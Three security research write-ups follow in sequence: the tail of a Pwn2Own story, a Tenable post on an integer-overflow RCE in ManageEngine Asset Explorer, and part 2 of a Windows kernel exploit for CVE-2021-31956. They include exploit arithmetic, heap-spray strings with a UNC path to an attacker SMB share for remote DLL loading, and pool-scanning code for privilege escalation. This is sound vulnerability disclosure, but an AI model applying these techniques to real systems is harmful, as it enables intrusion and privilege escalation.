After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spent around 1.5 weeks from the start of our research until we had found the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all the Windows internals needed for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

This blog will go over the exploitation of an integer overflow (CVE-2021–20082) that I found in the agents themselves, called Asset Explorer Agent. This exploit could allow an attacker to pivot through the network once the ManageEngine server is compromised. Alternatively, it could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability, as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echoes back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem, since that configured IP address is not ours; the agent instead asks the real Manage Engine server to approve the authtoken we sent, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used, one of which is HttpQueryInfoW, used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field of UINT32_MAX/4, we should be able to overflow the integer so that it wraps back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API, InternetReadFile, will copy our POST payload data into the destination buffer until all of the POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two-byte buffer, resulting in a heap overflow.
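
To make the wrap-around concrete, here is the arithmetic (paraphrased from the description above) for a Content-Size of UINT32_MAX/4, truncated to 32 bits as it would be in the 32-bit agent:

UINT32_MAX = 0xFFFFFFFF
content_size = UINT32_MAX // 4                      # 0x3FFFFFFF, attacker supplied

alloc_size = ((content_size + 1) * 4 + 2) & 0xFFFFFFFF
print(hex(alloc_size))                              # 0x2 -> calloc() gets 2 bytes,
                                                    # while the POST body can be huge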

Things are looking really good here because we can not only control the size of the heap overflow (tailoring our POST data size to overwrite whatever amount of heap memory), but we can also write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a doubly linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic, which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from the Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means that if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the _CrtMemBlockHeader* next pointer will be written to the location that *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what *next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite the *prev pointer with any arbitrary data I want, as it must itself be a valid pointer to a writable memory location, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory, and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as those point to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause an access violation). This proved to be very constraining for my exploitation.
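
A toy model of the two remerging writes may help to see the primitive. The offsets and addresses below are purely illustrative (not the exact CRT layout), and "memory" is just a dict:

# "Memory" is modelled as a dict of 32-bit slots; the link-field offsets
# inside _CrtMemBlockHeader are illustrative, not the exact CRT definition.
memory = {}
OFF_NEXT = 0x0
OFF_PREV = 0x4

def free_dbg_unlink(next_ptr, prev_ptr):
    """The two remerging writes performed when the corrupted cell is freed."""
    memory[next_ptr + OFF_PREV] = prev_ptr   # *(next + OFF_PREV) = prev
    memory[prev_ptr + OFF_NEXT] = next_ptr   # *(prev + OFF_NEXT) = next

# Hypothetical addresses: a .data slot we want to modify, and the heap address
# of a string we control.
target_slot = 0x004F0000
our_string  = 0x02D0F0F8

# Point one link field at the target slot and the other at our string; the
# free then writes the string's address into the target slot for us.
free_dbg_unlink(next_ptr=target_slot - OFF_PREV, prev_ptr=our_string)
assert memory[target_slot] == our_string

# Side effect: the string's memory also gets a pointer written into it, which
# is why both overwritten fields must themselves point to writable memory.
assert memory[our_string + OFF_NEXT] == target_slot - OFF_PREV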

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found that this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service, which is exactly what I want for developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process, and in large part due to my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up overflowing the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I initially send the following string to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer, then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I chose to overwrite the lowest order byte with “0xf8”, to guarantee the maximum offset from the _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string with prepended nonsense characters (similar to a nop-sled, but for a file path). This will give us a greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for an SMB share, so thanks goes to Chris Lyne, who was able to craft a nice padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte with 0xf8. Much better odds than if I used a simple, straightforward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off its current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function. I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory, nor can I even overwrite a function pointer with this function address. There was one place, however, where I saw a pointer TO a function pointer being called, which is actually possible for me to abuse. It’s in the _CrtDbgReport function, which allows the Microsoft runtime to alert in the event of various integrity violations, one of which is a failure of a heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but we can leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in the .data section too!). This is also great because it doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (a big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to the function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute “MSPDB80.dll” off our remote SMB share.

We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier, where subsequent heap cell allocations are used to bypass the infoleak. This is because that unique scenario only applied to unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I chose to overwrite the _pfnReportHook variable with a random offset into my heap (again, no infoleak required: a similar technique to partially overwriting the _CrtMemBlockHeader* next pointer, but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdbDll function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. ManageEngine has since patched this issue. For more details you can check out the advisory at https://www.tenable.com/security/research.



CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger it

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the use of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within a blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice, for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming for is as follows:

The difficulty with this is that, due to the low fragmentation heap (LFH) randomisation, reliably achieving this memory layout is more difficult, and iteration one of this exploit stayed away from this approach until more research had been performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absence of an LFH "Heap Randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which, when added to the header (0x10) and the POOL_HEADER (0x10), also ends up in an allocated chunk of size 0xC0).

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, since we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of freeing holes as in the previous article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know whether we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and check for corruption by looping through and querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.
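
For illustration, the detection loop looks something like the following ctypes sketch (the real exploit is native code; sprayed_names is assumed to hold the 64-bit WNF state names created during the spray, each originally written with 0xA0 bytes of data):

import ctypes
from ctypes import wintypes

ntdll = ctypes.WinDLL("ntdll")

def query_data_size(state_name: int) -> int:
    """Ask the kernel how much state data it reports for this name."""
    name = ctypes.c_ulonglong(state_name)
    change_stamp = wintypes.ULONG(0)
    buf = (ctypes.c_char * 0x1000)()
    size = wintypes.ULONG(ctypes.sizeof(buf))
    ntdll.NtQueryWnfStateData(
        ctypes.byref(name),          # StateName
        None,                        # TypeId
        None,                        # ExplicitScope
        ctypes.byref(change_stamp),  # ChangeStamp
        buf,                         # Buffer
        ctypes.byref(size),          # BufferSize (in/out, set to the reported size)
    )
    return size.value

def find_corrupted(sprayed_names):
    """Each sprayed object holds 0xA0 bytes; anything reporting more has had its
    DataSize overflowed and is our relative read/write object."""
    for name in sprayed_names:
        if query_data_size(name) > 0xA0:
            return name
    return None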

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally the chunk containing our unbounded _WNF_STATE_DATA can be allocated as the final block within the pool segment. This means that when querying with NtQueryWnfStateData, an unmapped memory read will occur off the end of the page. This rarely happens in practice, and increasing the spray size reduces the likelihood of it occurring (see the Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. From practical testing, performing a large spray before triggering the overflow means this rarely happens within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall, with 1) remediated and 2) and 3) only occurring very rarely, in lieu of a perfect solution we can move on to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above (and within the first blog post), we can use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.
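A minimal sketch of that scan, assuming buf holds the bytes returned by querying our unbounded _WNF_STATE_DATA, and using _WNF_NAME_INSTANCE member offsets from the build discussed here (StateName 0x28, ScopeInstance 0x30, StateData 0x58, CreatorProcess 0x98), which should be verified against the target:

typedef struct _LEAKED_NAME_INSTANCE {
    ULONG64 StateName;
    ULONG64 ScopeInstance;
    ULONG64 StateData;
    ULONG64 CreatorProcess;
    SIZE_T  Offset;          // offset of the header within the leaked buffer
} LEAKED_NAME_INSTANCE;

BOOL FindAdjacentNameInstance(const unsigned char *buf, SIZE_T len,
                              LEAKED_NAME_INSTANCE *out)
{
    // 0x903 node type code and 0xA8 node byte size mark a _WNF_NAME_INSTANCE header.
    static const unsigned char sig[] = { 0x03, 0x09, 0xA8, 0x00 };

    for (SIZE_T i = 0; i + 0xA0 < len; i++) {
        if (memcmp(buf + i, sig, sizeof(sig)) != 0)
            continue;

        out->Offset         = i;
        out->StateName      = *(ULONG64 *)(buf + i + 0x28);
        out->ScopeInstance  = *(ULONG64 *)(buf + i + 0x30);
        out->StateData      = *(ULONG64 *)(buf + i + 0x58);
        out->CreatorProcess = *(ULONG64 *)(buf + i + 0x98);
        return TRUE;
    }
    return FALSE;
}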

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the location the new StateData points at overlaps with sane values for the AllocatedSize and DataSize preceding the data we wish to read or write.

In this case the aim was to achieve a full arbitrary read and write, but without the constraint of needing to find sane and reliable AllocatedSize and DataSize values in front of each location we want to write to.

Our overall goal was to target the KTHREAD structure's PreviousMode member and then make use of the NtReadVirtualMemory and NtWriteVirtualMemory APIs to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structures are used in order to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer, which deals with general OS policy and operations. The kernel subsystem handles architecture-specific details for low level operations, and the HAL provides an abstraction layer to deal with differences between hardware.

Processes and threads are represented at both the executive and kernel "layers" within kernel memory as _EPROCESS/_KPROCESS and _ETHREAD/_KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is not set (i.e. it is KernelMode rather than UserMode) for the calling thread, the address validation is skipped and kernel memory space addresses can be written to:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
